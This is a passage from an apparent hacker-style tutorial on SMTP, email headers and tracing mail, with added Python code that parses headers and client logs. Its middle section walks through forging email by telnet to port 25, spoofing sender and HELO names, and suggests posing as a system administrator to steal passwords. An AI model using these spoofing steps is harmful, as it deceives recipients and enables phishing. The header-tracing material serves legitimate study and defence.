
Now in the other case, i.e. when you receive mail, your email client by default connects to port 110, i.e. the POP3 or Post Office Protocol (version 3) port. Once connected the POP3 daemon authenticates you, i.e. asks for a user name and password, which is automatically sent by your email client to the server. Once authenticated, you can receive mail. This means that to send mail you need no user name and password but to receive mail you need a username and password. Recently Yahoo, once it started providing POP based mail, had developed this problem that the user could not send mail unless he had received mail, i.e. he had authenticated.

Now in the case of free Web based services too the same thing happens. In this case you compose your email in a form whose action tag points to a CGI (or Common Gateway Interface) script which sends the content of the form (that would be what you composed or typed out) to the Sendmail daemon which is running on Port 25 of the mail server of the company whose mail services you are using. Here you are authenticated once you enter your user name and password at the login page. Sendmail daemons of web based mail servers too can be used to send mail without authentication.

************************

UberHacker Note: Above I have assumed that you have some knowledge of Web development, i.e. HTML or HyperText Markup Language and CGI.

To Learn HTML goto:

www.htmlgoodies.com

Search the MSDN Library, which I think is simply the most amazing and the most comprehensive library containing all types of tech text. URL: http://msdn.microsoft.com

Learn CGI programming with Perl 5 by reading my Perl Tutorials.

*************************

What is my mail server, or which is the server I connect to to send email? Now if you use the email service provided by your ISP then it is pretty simple to find out the mail server you connect to, to send and receive mail. Say your ISP's name is xyz and their domain is xyz.com.

Then your mail server would most probably be mail.xyz.com (Port 25) to send mail and mail.xyz.com (Port 110) to receive mail. Instead of mail.xyz.com (Port 25) for sending mail, you can also try mailgw.xyz.com (Port 25).

Email Headers

The Sendmail daemon is a really interesting one which allows you to get root on a badly configured system and also allows you to send fake mail!!! Well, to understand the concept of fake mail you need to be more thorough with email headers, so let me start by explaining what email headers actually are. This brings me back to the subject of what exactly happens when you send a mail; let me resume from what happens after the Sendmail daemon has sent your mail. Say you live in Los Angeles and have sent an email to a friend in New York, so how does your email reach New York? Once the Sendmail daemon has composed your mail it will send the mail to the server whose domain name is the same as the domain name that you entered (in an email the domain name is the text after the @ sign). So your email may first be sent to the server of the company that provides the Internet backbone in your country and from there it would be sent to the server on which your friend has an account, so your email travels through a number of routers and servers before reaching your friend's Inbox. Whatever server an email has travelled through is recorded in the headers of the email; the entire path taken by the email and other valuable info is provided by email headers.

So How do I see Headers?

Now to look at the complete headers in Outlook Express, right click on the message and select Properties. This will bring up a window showing only partial headers; to see the full headers click on the Message Source button. In Netscape you can look at headers by clicking on View>Headers>Full. To learn how to see full headers in your fav email client browse the Help of your client.

So you did the above and now know that Headers contain some IP addresses and some Host Names. Now I will explain what exactly Headers Tell you. Now let's take an example header that I specially prepared for you guys.

Return-Path: name@xyz.net

Received: from mail2.xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST)

From: "[Noname]" <name@xyz.net>

To: "Ankit Fadia" <ankit@bol.net.in>

Subject: More questions :)

Date: Mon, 28 Feb 2000 22:13:12 +0100

Message-ID: <20000407131945.16316.qmail@mail2.xyz.net>

MIME-Version: 1.0

Content-Type: text/plain; charset="iso-8859-1"

Content-Transfer-Encoding: 7bit

X-MSMail-Priority: Normal

X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)

 

Now let's go through the entire headers line by line.

Return-Path: name@xyz.net

The above line tells us that the sender is name@xyz.net.

This line can easily be forged, but let's stick to the headers of a genuine email which has not been forged. This line also tells us the name of the ISP or the name of the company with which the sender has an email account. In this case xyz becomes the name of the ISP or email service provider and www.xyz.net would normally be the website of the email provider.

Moving further down we find the following line:

Received: from xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM)

id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST)

The above line tells us that the email travelled from the server xyz.net to the server delhi1.mtnl.net.in. The text in the brackets after delhi1.mtnl.net.in gives us the Sendmail version number running at delhi1.mtnl.net.in. The above header tells us that delhi1.mtnl.net.in is running version 8.9.1 of Sendmail at port 25. Within the brackets there is a date (in this case 26Oct99-0620AM); this date is not the date at which the email passed through this server but represents when the Sendmail daemon was last configured or set up or upgraded. The next line in the same header gives us the date at which the email passed through the server.

By reading this header we already know that the mail originated at mail2.xyz.net and was sent by name@xyz.net to ankit@bol.net.in. The mail server of name@xyz.net (i.e. mail2.xyz.net) then passed on the email to my mail server which is delhi1.mtnl.net.in. My mail server then delivered the email to my account.

Before we get on to the easier to understand but less important lines, I would like to discuss the Message ID line:

Message-ID: 20000407131945.16316.qmail@mail2.xyz.net

Now if you look at this line carefully you will find that it gives out some very valuable info on the server at which the email was written and also some info as to when the sender or his email client logged on to his mail server and sent this mail. To further understand the above line, let's break it up into smaller pieces.

The part 20000407131945 represents the date/time at which the sender logged on to the mail server to send the mail. It shows the date/time in the yyyymmddhhmmss format. So the above piece of gibberish can be rewritten as:

2000/04/07/13:19:45 which is Year:2000,Month:April(4th month),Day:7th, and Time is 1:19 and 45 seconds(PM)

The number after the first dot, i.e. 16316, is the reference number of that particular email. You know that this email was sent from mail2.xyz.net, but many more, maybe thousands more, have been sent by that mail server on that particular day, so in order to distinguish mails from each other, each mail is referred to by a unique Message ID. For each mail that a mail server sends, it logs details regarding the sender, time etc. To distinguish between the logs of two different emails, the unique Message ID is used. So one can gather more info on the sender of a particular email by contacting the system administrator of the mail server that the sender used, quoting the Message ID.

The next bit tells us that the mail server mail2.xyz.net is running qmail which like Sendmail is a daemon which handles sending of emails.

The remaining few lines are also quite self Explanatory:

From: "[Noname]" <noname@isp.net>

To: "Ankit Fadia" <ankit@bol.net.in>

Subject: More questions :)

Date: Mon, 28 Feb 2000 22:13:12 +0100

MIME-Version: 1.0

Content-Type: text/plain; charset="iso-8859-1"

Content-Transfer-Encoding: 7bit

This tells us that the nickname of the person who has sent this mail is [Noname] and his mail address would be noname@isp.net. The next line specifies the email address to which the mail was sent. The rest of the lines give us MIME and other info on encoding etc.

X-MSMail-Priority: Normal

X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)

X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300

The X-Mailer header tells us the email client which sent the mail, in this case Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0).

You may say that headers are very boring and what the hell do they have to do with hacking. Well, hacking is about knowledge and knowledge can never be bad for you, and the ability to read headers is quite useful when one has to trace spammers or find out the person who mail bombed him. Most newbies spend a lot of time scanning for Internet hosts with Port 25 open and never bother to learn how to read headers. They do not know that headers provide you with a list of mail servers which may allow you to send perfectly forged mail. So take my advice and try to be as thorough with headers as you can; you are not a hacker if you are not able to read email headers.
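An added example (not from the original manual) that automates the header reading described above with Python's standard email module. It walks the Received: hops in delivery order, decomposes a qmail Message-ID the way the text does, and compares the domain in Return-Path with the host named in the earliest Received: line, which is the check you use when tracing spam or a mail bomber. The two header samples are constructed: GENUINE is the example header above and FORGED is modelled on the forged-mail headers shown later in this manual. It also reports the gap between the Date: header and the first Received: stamp (in the sample above they are over five weeks apart).

```python
import re
from email import message_from_string
from email.utils import parseaddr, parsedate_to_datetime
from typing import Dict, List, Optional

# Constructed sample headers for this example. GENUINE is the example header
# walked through above; FORGED is modelled on the forged-mail headers shown
# later in this manual. Neither is a real captured message.
GENUINE = """\
Return-Path: name@xyz.net
Received: from mail2.xyz.net by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id SAA0000012322; Fri, 7 Apr 2000 18:51:27 +0530 (IST)
From: "[Noname]" <name@xyz.net>
To: "Ankit Fadia" <ankit@bol.net.in>
Subject: More questions :)
Date: Mon, 28 Feb 2000 22:13:12 +0100
Message-ID: <20000407131945.16316.qmail@mail2.xyz.net>
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)

"""
FORGED = """\
Return-Path: <billgates@microsoft.com>
Received: from ankit.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM) id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST)
Date: Fri, 7 Apr 2000 20:01:52 +0530 (IST)
From: <billgates@microsoft.com>
Message-Id: <200004071431.UAA0000026614@delhi1.mtnl.net.in>

"""

# "from <sender host> by <this MTA> (<MTA version info>)" as Sendmail writes it.
RECEIVED_RE = re.compile(
    r"from\s+(?P<from>\S+)\s+by\s+(?P<by>\S+)(?:\s+\((?P<mta>[^)]*)\))?", re.I
)
# qmail-style Message-ID: <YYYYMMDDhhmmss.<number>.qmail@host>
QMAIL_ID_RE = re.compile(r"^<?(?P<ts>\d{14})\.(?P<num>\d+)\.qmail@(?P<host>[^>\s]+)>?$")


def received_hops(raw: str) -> List[Dict[str, object]]:
    """Received: hops in delivery order (oldest first).

    Every MTA prepends its own Received: line, so the header order is newest
    first; reversing it puts the server nearest the sender at index 0.
    """
    msg = message_from_string(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        m = RECEIVED_RE.search(value)
        stamp = value.rsplit(";", 1)[1].strip() if ";" in value else None
        hops.append({
            "from": m.group("from") if m else None,
            "by": m.group("by") if m else None,
            "mta": m.group("mta") if m else None,     # e.g. "8.9.1/..." = Sendmail version
            "time": parsedate_to_datetime(stamp) if stamp else None,
        })
    return hops


def decode_qmail_message_id(message_id: str) -> Optional[Dict[str, str]]:
    """Split a qmail Message-ID into submission time, per-message number and host."""
    m = QMAIL_ID_RE.match(message_id.strip())
    if m is None:
        return None                      # some other MTA's id format (e.g. Sendmail's)
    ts = m.group("ts")
    return {
        "submitted": f"{ts[0:4]}-{ts[4:6]}-{ts[6:8]} {ts[8:10]}:{ts[10:12]}:{ts[12:14]}",
        "number": m.group("num"),
        "software": "qmail",
        "host": m.group("host"),
    }


def origin_check(raw: str) -> Dict[str, object]:
    """Compare the claimed sender domain with the host that first handed the mail in.

    Return-Path/From are whatever the client typed; the first Received: line was
    written by the receiving MTA, so a mismatch is a forgery indicator.
    """
    msg = message_from_string(raw)
    sender = parseaddr(msg.get("Return-Path") or msg.get("From") or "")[1]
    claimed = sender.rsplit("@", 1)[-1].lower() if "@" in sender else ""
    hops = received_hops(raw)
    first_hop = str(hops[0]["from"] or "").lower() if hops else ""
    consistent = bool(claimed) and (first_hop == claimed or first_hop.endswith("." + claimed))
    date = parsedate_to_datetime(msg["Date"]) if msg.get("Date") else None
    first_time = hops[0]["time"] if hops else None
    delay = (first_time - date).total_seconds() if (date and first_time) else None
    return {
        "claimed_domain": claimed,
        "first_hop": first_hop,
        "consistent": consistent,
        "date_to_first_hop_seconds": delay,
    }
```

Treat a mismatch as an indicator, not proof: mail legitimately relayed through a third-party host fails this check too, and the host name in a Received: line comes from the client's HELO, which is why the Sendmail 250 reply quoted in the next section also records the connecting IP in square brackets.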

Sending Forged Mail using SMTP (Port 25)

Ever dreamt of sending forged emails so that the victim does not know who sent this email??? Or do you want to send an email to someone so that he thinks that the sender of the email is not you but someone else??? Well then email forging is the thing for you. Sending a forged email is quite simple and easy to understand, but you just need to apply a little bit of your brain to understand the various aspects of a perfect forged email and the various applications of forging emails. Now first let us see how one can send a forged email.

Remember that earlier in this guide I had explained how an email is sent? If you do not remember then I would suggest you go back a bit and refresh your memory by reading the section titled "SMTP [Port 25] & POP [Port 110]"

Now let's log on to Port 25 of a mail server and see how the Sendmail daemon behaves and how we can send a forged mail.

Open your fav Telnet client (my favourite is the one that ships with Windows anyway), then telnet to Port 25 of the mail server. You will be welcomed by something that is called a daemon banner.

220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/26Oct99-0620AM) Fri, 7 Apr 2000 19:57:05 +0530 (IST)

**************

Hacking Truth: A daemon banner is nothing but a welcome message that the host provides to visitors. But a daemon banner is not merely an unimportant welcome message. It provides us with some very valuable info on the host we have connected to; for example when I connect to Port 23 of my ISP, I get a welcome message along with the joke of the day and also, most important of all, the OS and OS version running at my ISP. This is very important when we are looking for an exploit which we can use to break in or get root.

*************

The daemon banner tells us the host we are connected to is running Sendmail version 8.9.1 and uses the ESMTP standard or Extended Simple Mail Transfer Protocol to transport messages. The number within the brackets gives the date and time the Sendmail daemon was last configured or upgraded. The date outside the brackets is the current date and time at the host. I am sure you must have got the hang of reading headers and such info by now....that makes you kewler than your friends!!!

And if you get an error message instead of the daemon banner then it means that the host you are trying to connect to has disabled public access to that mail server to increase the security of the network.

Before I go on let's see what your email client does when it has connected to Port 25 and started communicating with the Sendmail daemon. The email client sends some Sendmail commands that it knows beforehand and orders Sendmail to prepare a mail for such and such person which is supposed to be from such and such person and the body of the email is to be blah blah blah.

The moral of the story is that the email client uses Sendmail commands to give info such as the sender's email address, the recipient's email address, the body of the email etc. to the Sendmail daemon. This means that the email client controls what info is given to Sendmail and whether this info is true or not. The above process of connecting to Port 25 of the mail server is not visible to the user and occurs in the background.

*************

Hacking Truth: Outlook Express in fact records all the commands that it issued to the mail server to send mails. This log file is stored in the "c:\windows\application data" folder under the name smtp.log. Just search for smtp.log and you will get many results. Let's look at a typical Outlook Express log file. The following is an excerpt:

Outlook Express 5.00.2314.1300

SMTP Log started at 10/08/1999 15:00:33

SMTP: 15:01:15 [rx] 220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/16Sep99-0827PM) Fri, 8 Oct 1999 14:50:17 +0530 (IST)

SMTP: 15:01:15 [tx] HELO hacker

SMTP: 15:01:15 [rx] 250 delhi1.mtnl.net.in Hello [203.xx.248.175], pleased to meet you

SMTP: 15:01:16 [tx] MAIL FROM: <ankit@bol.net.in>

SMTP: 15:01:16 [rx] 250 <ankit@bol.net.in>... Sender ok

SMTP: 15:01:16 [tx] RCPT TO: <billgates@hotmail.com>

SMTP: 15:01:16 [rx] 250 <billgates@hotmail.com>... Recipient ok

SMTP: 15:01:16 [tx] DATA

SMTP: 15:01:16 [rx] 354 Enter mail, end with "." on a line by itself

SMTP: 15:01:20 [tx]

.

SMTP: 15:01:23 [rx] 250 OAA0000014842 Message accepted for delivery

SMTP: 15:01:23 [tx] QUIT

SMTP: 15:01:23 [rx] 221 delhi1.mtnl.net.in closing connection

Those of you who are already familiar with SMTP or Sendmail commands can pretty much make out how revealing this log file is and what kind of important info on the email sending activities of the user it reveals.

Such a detailed report or log on each and every mail ever sent through Outlook Express is recorded in this file. Deleting emails from the Sent folder of Outlook Express does not clean these logs. A well informed hacker would in no time be able to get a list of people to whom you have sent mails. Well that is Microsoft for you!!! Well at least the log file does not reveal the actual body of the email. And if you can't make head or tail of the above, then read on.

*******************
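An added example (not from the original manual) that reconstructs the sessions in a smtp.log like the one above. Each [rx] line is a numbered server reply and each [tx] line a client command, so the envelope sender, every recipient and the server's queue id for the message can be recovered even though the body is never in the log. This is the kind of parsing done when a client machine is examined in an incident investigation, and it is also the reason a log like this should be treated as sensitive data. The sample log is constructed from the excerpt above, with the client IP masked as it is there.

```python
import re
from typing import Dict, List

# Constructed excerpt modelled on the Outlook Express smtp.log shown above
# (the client IP is masked exactly as in the original; no real log was used).
SAMPLE_SMTP_LOG = """\
Outlook Express 5.00.2314.1300
SMTP Log started at 10/08/1999 15:00:33
SMTP: 15:01:15 [rx] 220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/16Sep99-0827PM) Fri, 8 Oct 1999 14:50:17 +0530 (IST)
SMTP: 15:01:15 [tx] HELO hacker
SMTP: 15:01:15 [rx] 250 delhi1.mtnl.net.in Hello [203.xx.248.175], pleased to meet you
SMTP: 15:01:16 [tx] MAIL FROM: <ankit@bol.net.in>
SMTP: 15:01:16 [rx] 250 <ankit@bol.net.in>... Sender ok
SMTP: 15:01:16 [tx] RCPT TO: <billgates@hotmail.com>
SMTP: 15:01:16 [rx] 250 <billgates@hotmail.com>... Recipient ok
SMTP: 15:01:16 [tx] DATA
SMTP: 15:01:16 [rx] 354 Enter mail, end with "." on a line by itself
SMTP: 15:01:20 [tx]
.
SMTP: 15:01:23 [rx] 250 OAA0000014842 Message accepted for delivery
SMTP: 15:01:23 [tx] QUIT
SMTP: 15:01:23 [rx] 221 delhi1.mtnl.net.in closing connection
"""

# "SMTP: hh:mm:ss [tx|rx] text": tx is what the client sent, rx the server's reply.
LOG_LINE_RE = re.compile(r"^SMTP: (?P<time>\d\d:\d\d:\d\d) \[(?P<dir>tx|rx)\] ?(?P<text>.*)$")
ADDR_RE = re.compile(r"<([^>]*)>")


def parse_smtp_log(text: str) -> List[Dict[str, object]]:
    """Rebuild each SMTP session recorded in an Outlook Express smtp.log.

    A session opens with the server's 220 greeting and closes with its 221
    reply. Between them the envelope (MAIL FROM / RCPT TO), the server's
    queue id and whether the message was accepted are all recoverable.
    """
    sessions: List[Dict[str, object]] = []
    current = None
    for raw in text.splitlines():
        m = LOG_LINE_RE.match(raw)
        if m is None:
            continue                 # file header lines and the bare "." terminator
        when, direction, msg = m.group("time"), m.group("dir"), m.group("text")
        if direction == "rx" and msg.startswith("220 "):
            current = {"start": when, "end": None, "server": msg.split()[1],
                       "banner": msg[4:], "mail_from": None, "rcpt_to": [],
                       "accepted": False, "queue_id": None}
            sessions.append(current)
            continue
        if current is None:
            continue                 # a line outside any session; ignore it
        upper = msg.upper()
        if direction == "tx" and upper.startswith("MAIL FROM:"):
            a = ADDR_RE.search(msg)
            current["mail_from"] = a.group(1) if a else msg.split(":", 1)[1].strip()
        elif direction == "tx" and upper.startswith("RCPT TO:"):
            a = ADDR_RE.search(msg)
            current["rcpt_to"].append(a.group(1) if a else msg.split(":", 1)[1].strip())
        elif direction == "rx" and msg.startswith("250 ") and "accepted for delivery" in msg.lower():
            current["accepted"] = True
            current["queue_id"] = msg.split()[1]   # the id the server logs the mail under
        elif direction == "rx" and msg.startswith("221 "):
            current["end"] = when
            current = None
    return sessions


def envelope_summary(sessions: List[Dict[str, object]]) -> List[str]:
    """One line per accepted message: sender, recipients and the server's queue id."""
    return [
        f"{s['mail_from']} -> {', '.join(s['rcpt_to'])} via {s['server']} (queue id {s['queue_id']})"
        for s in sessions if s["accepted"]
    ]


if __name__ == "__main__":
    for line in envelope_summary(parse_smtp_log(SAMPLE_SMTP_LOG)):
        print(line)
```

The queue id is the same value the server writes into its own logs and into the Received: line of the delivered message, so it is what lets an investigator match a client-side session to the server's record of it.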

Now that we have connected to Sendmail we are going to repeat the entire above process manually to send forged mail.

You do not need to memorise or remember these SMTP commands in order to send forged mail. Whenever you have the slightest doubt or have forgotten the syntax or the command itself, you can easily get help by simply typing 'help' at the Sendmail prompt. On some systems typing '?' might bring a response.

NOTE: Whatever you type at the Sendmail prompt is not visible to you unless you enable the local echo option. If you are using the Telnet client shipping with Windows then simply click on Terminal > Preferences and from the dialog box enable the Local Echo option.

So typing help at the prompt produces the following result:

214-This is Sendmail version 8.9.1

214-Topics:

214- HELO EHLO MAIL RCPT DATA

214- RSET NOOP QUIT HELP VRFY

214- EXPN VERB ETRN DSN

214-For more info use "HELP <topic>".

214-To report bugs in the implementation send email to

214- sendmail-bugs@sendmail.org.

214-For local information send email to Postmaster at your site.

214 End of HELP info

To get help on an individual command, type help followed by the command name. For example, typing

help helo

Brings the following response:

214-HELO

214- Introduce yourself.

214 End of HELP info

Eagle eyed readers must have noticed that all messages from the server have a preceding number; well, you guessed it, the number represents the kind of message that follows. For example, all help messages carry the code 214. Each kind of reply the server sends has its own code, and the first digit tells you the class of the reply: 2xx means the command succeeded, 3xx means the server wants more input (the 354 you get after DATA), 4xx is a temporary failure and 5xx a permanent one.

Before you go on, I suggest you find out what each command does by typing help followed by the command name, and if possible read the Unix man pages on Sendmail; they are quite good. You will not be able to understand the next part if you do not know the syntax and use of each command, so do read the Sendmail help before reading further. Anyway, let's move on.

Now let's see...I want to send myself an email at ankit@bol.net.in from billgates@microsoft.com

So I type the following; note that the text I type has no preceding number, while the text with a preceding number is the response from the server I am connected to.

helo ankit.com

250 delhi1.mtnl.net.in Hello, pleased to meet you

mail from:billgates@microsoft.com

250 <billgates@microsoft.com> ... Sender Okay

rcpt to:ankit@bol.net.in

250 <ankit@bol.net.in> ... Recipient Okay

data

354 Enter mail, end with "." on a line by itself

My first forged mail!!!

.

250 Mail accepted

Then I opened my Inbox and read through the headers of the email I had just forged.

Return-Path: <billgates@microsoft.com>

Received: from ankit.com by myisp.com(8.9.1/1.1.20.3/26Oct99-0620AM)

id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST)

Date: Fri, 7 Apr 2000 20:01:52 +0530 (IST)

From: <billgates@microsoft.com>

Message-Id: <200004071431.UAA0000026614@delhi1.mtnl.net.in>

X-UIDL: dcbef1ba736c55ddc08d6a93609979a9

 

The email seems to be pretty much a perfect forgery, but the line that is the most obvious culprit, and gives me away, is:

Received: from ankit.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM)

id UAA0000026614; Fri, 7 Apr 2000 20:01:52 +0530 (IST)

The ankit.com would arouse the suspicion of any experienced hacker. How can the following scenario be true: the address the message supposedly comes from has the domain name microsoft.com, yet the email header says that the mail was handed in not by a mail server within Microsoft's network but by ankit.com, which is supposedly a mail server?

Now why did Sendmail put ankit.com in the header? I went through the SMTP commands I had issued once again and found that I had given the command helo ankit.com, and Sendmail had picked up this name and put it into the Received header: whatever you claim in HELO is copied there verbatim. So to remove ankit.com from the header and make the email look more authentic, I change the parameter that I pass to the HELO command. Keep in mind that this only works because this particular server records nothing but the HELO name. Sendmail normally also writes the connecting host's real name and address in parentheses after it, in the form "Received: from spammer (marc@math.university.edu [150.129.84.5])" that you will see in the ROOTSHELL advisory further down, and that part comes from the receiving server's own lookups, not from anything you type.

Instead of 'helo ankit.com' I try 'helo microsoft.com' and leave the other commands the same. Now when I look at the headers, I see that they have changed to:

Return-Path: <billgates@microsoft.com>

Received: from microsoft.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM)

id UAA0000020667; Fri, 7 Apr 2000 20:00:10 +0530 (IST)

Date: Fri, 7 Apr 2000 20:00:10 +0530 (IST)

From: <billgates@microsoft.com>

Message-Id: <200004071430.UAA0000020667@delhi1.mtnl.net.in>

X-UIDL: 636646d210be0e13fbcf936308c99222

The ankit.com bit does not appear any more, and this kind of forgery may pass if the person you are sending it to is a newbie. But an experienced hacker will definitely point out that the Message-Id part of the header says the email was composed at delhi1.mtnl.net.in, while the Received line says it came from microsoft.com. So he would write to postmaster@delhi1.mtnl.net.in, help@delhi1.mtnl.net.in or root@delhi1.mtnl.net.in and complain that he has received a forged email which he would like investigated. Most system administrators are really jumpy about their servers being used for purposes they were not meant for and will readily cooperate with the complainer, and you are caught: the queue id in the Message-Id (UAA0000020667, the same id that appears in the Received line) points straight at the entry in the server's log, which records the address and time of the connection that submitted the message. Some ISPs are so cranky that if you are caught doing something like this you will probably be kicked off their service.

There is no solution to this problem, in the sense that the victim can always send an email to the administrator of the server shown in the Message-Id line. The forgery would look more real if the Message-Id showed a mail server in the same domain as the forged address: for a forged billgates@microsoft.com, something like mail.microsoft.com instead of delhi1.mtnl.net.in. Bear in mind, though, that the Message-Id is just another header; the Received line, which the relay writes itself, still names the relay, so the trail back to its logs remains whatever the Message-Id says.

*******************

Hacking Truth: When we give MAIL FROM: billgates@microsoft.com, the mail appears to have come from Bill Gates. But instead of a full email address we can give the MAIL FROM command something like root or localhost. So for example, if I enter the command MAIL FROM: root, then the headers of the email would look like:

Return-Path: <root>

Received: from microsoft.com by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id TAA0000022089; Sun, 9 Apr

2000 19:55:42 +0530 (IST)

Date:Sun, 9 Apr 2000 19:55:42 +0530 (IST)

From: root@microsoft.com

Message-ID:200004091425.TAA0000022089@mailgw.xx.microsoft.com

X-UIDL: 636646d210be0e13fbcf936308c99222

This way we can make the email seem to have come from the system administrator, which can in turn be used to fool people into giving away their Internet passwords. Yes, email forging CAN be used to steal passwords; one just needs a bit of intelligence and a great deal of luck. Note that the Received line still records the relay that accepted the message, exactly as before.

*******************

Now that you know how to read some basic headers, let's examine the more elaborate headers you receive on every email sent through a mailing list. When you view the full headers of an email received through a mailing list you will find that they are longer and more difficult to understand. Let's take an example to make things clearer. The following are the headers of a recent email that I received through my mailing list, programmingforhackers. [I myself had sent this email to the list.]

Return-Path: <sentto-1575622-4-ankit=bol.net.in@returns.onelist.com>

Received: from b05.egroups.com by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13

Apr 2000 14:29:14 +0530 (IST)

X-eGroups-Return: sentto-1575622-4-ankit=bol.net.in@returns.onelist.com

Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000

08:58:09 -0000

Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000

Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr

2000 08:58:07 -0000

Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with SMTP; 13 Apr 2000 08:58:07 -0000

Received: (qmail 2092 invoked from network); 13 Apr 2000 08:58:01 -0000

Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with

SMTP; 13 Apr 2000 08:58:01 -0000

Received: from bol.net.in by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13

Apr 2000 14:28:46 +0530 (IST)

Message-ID: <38F61F28.B2045192@bol.net.in>

X-Mailer: Mozilla 4.5 [en] (Win98; I)

X-Accept-Language: en

To: "programmingforhackers@eGroups.com" <programmingforhackers@eGroups.com>

References: <38F4E37B.55A83239@bol.net.in>

MIME-Version: 1.0

Mailing-List: list programmingforhackers@egroups.com; contact

programmingforhackers-owner@egroups.com

Delivered-To: mailing list programmingforhackers@egroups.com

Precedence: bulk

List-Unsubscribe:<mailto:programmingforhackers-unsubscribe@egroups.com>

Date: Thu, 13 Apr 2000 15:25:33 -0400

X-eGroups-From: Ankit Fadia <ankit@bol.net.in>

From: Ankit Fadia <ankit@bol.net.in>

Reply-To: programmingforhackers-owner@egroups.com

Subject: [programmingforhackers] Hi

Content-Type: multipart/alternative;

boundary="------------EF668DA53EE7F0ED0AA654E9"

This email header is a lot different from the headers we examined earlier, but it is not as difficult to understand as it seems; believe me, it is quite easy once you get the hang of it. To examine this header we will go in reverse order, i.e. take the bottommost line first and slowly move up. The reason is that every mail server which handles a message adds its own Received line at the top of the headers, so the topmost Received line is the last hop (the server nearest to you) and the bottommost is the first.

Date: Thu, 13 Apr 2000 15:25:33 -0400

X-eGroups-From: Ankit Fadia <ankit@bol.net.in>

From: Ankit Fadia <ankit@bol.net.in>

Reply-To: programmingforhackers-owner@egroups.com

Subject: [programmingforhackers] Hi

Content-Type: multipart/alternative;

boundary="------------EF668DA53EE7F0ED0AA654E9"

This part of the header tells us that the mail was sent by ankit@bol.net.in on 13th April at 3:25:33 PM, four hours behind GMT (the -0400 offset; this Date line was written by the sender's mail client, not by the list server). It also tells us that replying to this email will send the message to the group owner of the mailing list (the same as the moderator of the list).

X-Mailer: Mozilla 4.5 [en] (Win98)

X-Accept-Language: en

To: "programmingforhackers@eGroups.com" <programmingforhackers@eGroups.com>

References: <38F4E37B.55A83239@bol.net.in>

MIME-Version: 1.0

Mailing-List: list programmingforhackers@egroups.com; contact

programmingforhackers-owner@egroups.com

Delivered-To: mailing list programmingforhackers@egroups.com

Precedence: bulk

List-Unsubscribe:<mailto:programmingforhackers-unsubscribe@egroups.com>

How many times have you seen lamers posting messages like "How can I unsubscribe from this list???" or even "Please unsubscribe me" to hardcore hacking lists? These so called hackers are nothing but script kiddies who are so lame that it doesn't even strike them that looking at the email headers might help. I wonder if they even know what headers are.

Most mailing lists (at least eGroups and Onelist do) attach information about the list to the headers: the list name, the email address of the moderator and the email address you have to write to in order to unsubscribe.

This part of the email header also tells us that the sender, ankit@bol.net.in, used Mozilla 4.5 running on Win98 and that the mail was sent to programmingforhackers@egroups.com.

Now comes the part which a newbie might find difficult to understand.

Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000

08:58:09 -0000

Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000

Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr

2000 08:58:07 -0000

Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with SMTP; 13 Apr 2000 08:58:07 -0000

Received: (qmail 2092 invoked from network); 13 Apr 2000 08:58:01 -0000

Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with

SMTP; 13 Apr 2000 08:58:01 -0000

Received: from bol.net.in by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13

Apr 2000 14:28:46 +0530 (IST)

Message-ID: 38F61F28.B2045192@bol.net.in

NOTE: Like I said earlier, we would be reading the lines in the reverse order.

Received: from bol.net.in by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46 +0530 (IST)

Message-ID: <38F61F28.B2045192@bol.net.in>

The Received line tells us that the mail was handed to the Sendmail daemon (version 8.9.1) running at delhi1.mtnl.net.in at 14:28:46 IST. The bol.net.in part is there because the email client used to send the mail gave delhi1.mtnl.net.in the following command:

helo bol.net.in

Hence it got into the header. The Message-ID, on the other hand, was supplied by the sender's mail client (Mozilla, according to the X-Mailer line) rather than generated by Sendmail, which is why it ends in bol.net.in and not in the server's name; compare the Sendmail-generated <200004071430.UAA0000020667@delhi1.mtnl.net.in> in the forged mail above. Once it had the message, the Sendmail daemon checked which domain the email had to be sent to, found that the recipient was programmingforhackers@egroups.com and said, "Let me pass it on to an egroups server."

Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr

2000 08:58:07 -0000

Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with SMTP; 13 Apr 2000 08:58:07 -0000

Received: (qmail 2092 invoked from network); 13 Apr 2000 08:58:01 -0000

